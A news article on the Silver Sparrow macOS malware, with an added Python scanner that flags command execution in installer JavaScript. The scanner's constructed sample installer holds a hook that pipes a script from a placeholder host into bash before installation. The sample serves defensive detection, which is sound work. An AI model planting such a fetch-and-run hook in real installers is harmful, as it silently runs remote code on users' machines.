New malware found on 30,000 Macs has security pros stumped


A previously undetected piece of malware found on almost 30,000 Macs worldwide is generating intrigue in security circles, which are still trying to understand precisely what it does and what purpose its self-destruct capability serves.

Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe delivery of any payload on any of the 30,000 infected machines, leaving the malware's ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met.

The malware is also notable for including a mechanism to completely remove itself, a capability usually reserved for high-stealth operations. So far, however, there are no signs that the self-destruct feature has been used, raising the question of why the mechanism exists.

Beyond those questions, the malware is notable for including a version that runs natively on the M1 chip Apple released in November, making it only the second known piece of macOS malware to do so. The malicious binary is further shrouded in mystery because it uses the macOS Installer JavaScript API to execute commands. That makes it hard to analyze the contents of the installation package or the way that package uses the JavaScript commands, since the logic lives in the installer's script rather than in the binaries it drops.
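The Installer JavaScript API mentioned above is what a macOS .pkg can carry in its Distribution XML: JavaScript in a `<script>` element, wired to hooks such as `installation-check`, that runs while the installer is still evaluating the package, and `system.run()` in that script executes an arbitrary program. The scanner below is an added example, not code from Red Canary or from the Silver Sparrow package; it parses a Distribution file (on a Mac, `pkgutil --expand some.pkg outdir` writes it as `outdir/Distribution`) and reports every `system.run` call and every script hook. The embedded sample Distribution is constructed for the example, with a made-up `example.invalid` host; it is not Silver Sparrow's real installer.

```python
"""Scan a macOS installer package's Distribution XML for JavaScript that
executes commands through the Installer JS API (system.run).

Added example for illustration; the sample package below is constructed and
is not the Silver Sparrow installer. Feed scan_distribution() the text of a
real Distribution file obtained with `pkgutil --expand` to scan one.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample: the element names follow Apple's Distribution format,
# the script contents and the example.invalid URL are made up.
SAMPLE_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Example Updater</title>
    <options customize="never" allow-external-scripts="no"/>
    <installation-check script="installationCheck()"/>
    <script>
    <![CDATA[
    function installationCheck() {
        // Runs before any payload is written: the command executes even if the
        // user never gets past the installer's first screen.
        system.run("/bin/bash", "-c", "/usr/bin/curl -s http://example.invalid/agent.sh | /bin/bash");
        return true;
    }
    function volumeCheck() {
        return system.version.ProductVersion >= "10.12";
    }
    ]]>
    </script>
    <choices-outline>
        <line choice="default"/>
    </choices-outline>
    <choice id="default" title="Example Updater"/>
</installer-gui-script>
"""

# Distribution elements whose `script` attribute names JS that the installer
# evaluates during its pre-install checks.
HOOK_ELEMENTS = ("installation-check", "volume-check")

# Matches one double- or single-quoted JS string literal, honouring backslash escapes.
_STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"' + r"|'((?:[^'\\]|\\.)*)'")


def _call_args(js, start):
    """Return the raw text between the parentheses of the call whose '(' is at js[start].

    Parentheses inside string literals are ignored so "(" passed as an argument
    does not confuse the match. Returns None for an unbalanced call.
    """
    depth = 0
    in_str = None
    i = start
    while i < len(js):
        c = js[i]
        if in_str:
            if c == "\\":
                i += 1  # skip the escaped character
            elif c == in_str:
                in_str = None
        elif c in "\"'":
            in_str = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return js[start + 1:i]
        i += 1
    return None


def find_system_run_calls(js):
    """Return the string-literal arguments of every system.run(...) call in the JS."""
    calls = []
    for m in re.finditer(r"system\s*\.\s*run\s*\(", js):
        raw = _call_args(js, m.end() - 1)
        if raw is None:
            calls.append(["<unparseable call>"])  # flag rather than silently skip
            continue
        calls.append([a or b for a, b in _STRING_LITERAL.findall(raw)])
    return calls


def find_script_hooks(root):
    """Return (element, script-expression) pairs for pre-install JS hooks."""
    return [(tag, el.get("script")) for tag in HOOK_ELEMENTS
            for el in root.iter(tag) if el.get("script")]


def scan_distribution(xml_text):
    """Parse a Distribution XML string and summarise its script-driven behaviour."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    scripts = [(el.text or "") for el in root.iter("script")]
    options = root.find("options")
    return {
        "script_blocks": len(scripts),
        "allow_external_scripts": options.get("allow-external-scripts") if options is not None else None,
        "hooks": find_script_hooks(root),
        "system_run_calls": find_system_run_calls("\n".join(scripts)),
    }


if __name__ == "__main__":
    # Usage: python scan_distribution.py [path/to/Distribution]; no path scans the sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_DISTRIBUTION
    report = scan_distribution(text)
    print(f"script blocks: {report['script_blocks']}, hooks: {report['hooks']}")
    for args in report["system_run_calls"]:
        print("system.run:", " ".join(args))
```

The thing to look for in the report is any `system.run` reachable from an `installation-check` or `volume-check` hook: that code runs during the installer's preflight, before any package payload is written, which is what makes the binaries inside the package a poor guide to what the installer actually does. The regex only catches literal `system.run(` calls; a script that aliases the `system` object or builds the command string at runtime will slip past it, so treat an empty result as "nothing obvious", not as a clean bill of health.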

The malware has been found in 153 countries, with detections concentrated in the US, UK, Canada, France, and Germany. Its use of Amazon Web Services and the Akamai content delivery network ensures the command infrastructure works reliably and also makes blocking the servers harder. Researchers at Red Canary, the security firm that discovered the malware, are calling it Silver Sparrow.

Fairly serious threat

“Although we have not yet observed Silver Sparrow delivering additional malicious payloads, its forward-looking M1 chip compatibility, global reach, relatively high infection rate and operational maturity indicate that Silver Sparrow is a fairly serious threat that is uniquely positioned to deliver a potentially impactful payload at a moment’s notice,” Red Canary researchers wrote in a blog post published Friday. “Given these causes for concern, in the spirit of transparency, we wanted to share everything we know sooner rather than later with the broader infosec industry.”

Silver Sparrow comes in two versions: one with a binary in Mach object (Mach-O) format compiled for Intel x86_64 processors, and the other a Mach-O binary compiled for the M1. The image below gives a high-level overview of the two versions:

[Image: overview of the x86_64 and M1 versions of Silver Sparrow. Credit: Red Canary]

So far, researchers have not seen either binary do anything, which has led them to call the files “bystander binaries.” Oddly, when executed, the x86_64 binary displays the words “Hello World!” while the M1 binary reads “You did it!” The researchers suspect the files are placeholders that give the installer something to distribute, with the real activity happening outside them, in the JavaScript that the installer runs.

Silver Sparrow is only the second piece of malware found to contain code that runs natively on Apple’s new M1 chip. A piece of adware reported earlier this week was the first. Native M1 code runs faster and more reliably on the new platform than x86_64 code does, because the former does not need to be translated before it is executed. Many developers of legitimate macOS applications have not yet finished recompiling their code for the M1. Silver Sparrow’s M1 version suggests that its developers are ahead of the curve.

Once installed, Silver Sparrow looks up the URL from which the installation package was downloaded, most likely so the malware operators can tell which distribution channels are most successful. In this respect, Silver Sparrow resembles macOS adware seen before. It remains unclear exactly how or where the malware is being distributed or how it gets installed. The URL check, however, suggests that malicious search results may be at least one distribution channel, in which case the installers would likely pose as legitimate applications.

One of the most impressive things about Silver Sparrow is the number of Macs it has infected. Red Canary researchers worked with their counterparts at Malwarebytes, and the latter group found Silver Sparrow installed on 29,299 macOS endpoints as of Wednesday. That is a significant achievement.

“For me the most important [thing] is that it’s found on almost 30K macOS endpoints … and it’s only endpoints that MalwareBytes can see, so the number is probably much higher,” wrote Patrick Wardle, a macOS security expert, in an Internet message. “It’s pretty widespread … and once again, macOS malware is becoming more pervasive and more common, despite Apple’s best efforts.”

For those who want to check whether their Mac is infected, Red Canary provides indicators of compromise at the end of its report.
